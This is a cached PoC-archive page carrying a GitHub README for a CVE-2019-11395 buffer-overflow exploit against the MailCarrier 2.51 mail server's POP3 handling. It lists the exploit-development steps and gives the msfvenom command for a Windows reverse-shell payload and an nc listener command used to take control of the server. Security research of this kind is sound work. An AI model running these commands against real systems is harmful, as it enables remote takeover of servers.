Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2019-11395 PoC — Taps Lab MailCarrier 缓冲区错误漏洞

Source
https://github.com/caioprince/CVE-2019-11395
Associated Vulnerability
Title:Taps Lab MailCarrier 缓冲区错误漏洞 (CVE-2019-11395)
Description:Taps Lab MailCarrier是韩国Taps Lab公司的一款基于Windows Server平台的邮件服务器。该产品支持SMTP、POP3和IMAP等协议。 Taps Lab MailCarrier 2.51版本中存在缓冲区溢出漏洞。该漏洞源于网络系统或产品在内存上执行操作时,未正确验证数据边界,导致向关联的其他内存位置上执行了错误的读写操作。攻击者可利用该漏洞导致缓冲区溢出或堆溢出等。
Description
A exploit for the CVE-2019-11395 vulnerability in the MailCarrier 2.51 email application, enabling remote code execution.
Readme
<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
</head>

<body>
  <h1 align="center">CVE-2019-11395 Exploit 🛡️</h1>

  <h2>About CVE-2019-11395 🕵️</h2>

  <p>The CVE-2019-11395 vulnerability describes a buffer overflow vulnerability in the MailCarrier 2.51 email application, allowing remote code execution. The vulnerability occurs in SMTP RCPT TO, POP3 USER, POP3 LIST, POP3 TOP, or POP3 RETR processes.</p>

  <p>During academic study, focus was placed on the POP3 processes to create a Proof of Concept (PoC). It was identified that sending 6000 bytes to the application causes it to stop functioning, thus revealing the buffer overflow vulnerability.</p>

  <h2>Exploitation Steps 🔍</h2>

  <ol>
    <li>Utilized <code>msf-pattern_create -l 6000</code> to accurately identify the EIP.</li>
    <li>Identified the EIP offset with <code>msf-pattern_offset -q 6E47386E -l 6000</code>, resulting in an EIP offset of 5095.</li>
    <li>Identified <code>expsrv.dll</code> with ASLR disabled, suitable for a JMP ESP.</li>
    <li>Identified bad characters <code>\x00\x0a\x0d</code> during tests for invalid characters.</li>
    <li>Generated payload with <code>msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode</code>.</li>
    <li>Adjusted the <code>CVE-2019-11395.py</code> code to accommodate the payload.</li>
    <li>Opened connection with <code>nc -lnvp 4444</code> and executed the exploit (<code>CVE-2019-11395.py</code>) to gain access to the environment and validate the described CVE.</li>
  </ol>

  <h2>Usage 🚀</h2>

<p>Follow these steps to utilize the exploit:</p>

<ol>
  <li>Generate the payload using <code>msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode</code>.</li>
  <li>Copy the output of the <code>msfvenom</code> command.</li>
  <li>Adjust the <code>CVE-2019-11395.py</code> code to replace the <code>shellcode</code> variable with the output obtained from the <code>msfvenom</code> command.</li>
  <li>Execute the exploit (<code>CVE-2019-11395.py</code>) to gain access to the environment and validate the described CVE.</li>
</ol>


  
  <h2>Compromised Environment 📸</h2>
  
  <img src="https://github.com/caioprince/CVE-2019-11395/blob/main/CVE-2019-11395.png" alt="PoC CVE-2019-11395" width="500">

 <section>
        <h2>🔗 Connect with me</h2>
        <p>Visit my profile on <a href="https://www.linkedin.com/in/caio-paiva-cyber-security/" target="_blank">LinkedIn</a></p>
    </section>
</body>

</html>
File Snapshot

 [4.0K]  /data/pocs/9cd98983bf6dc86610a72d600dee1b2b2f338bf7
├── [ 29K]  CVE-2019-11395.png
├── [2.5K]  CVE-2019-11395.py
└── [2.6K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.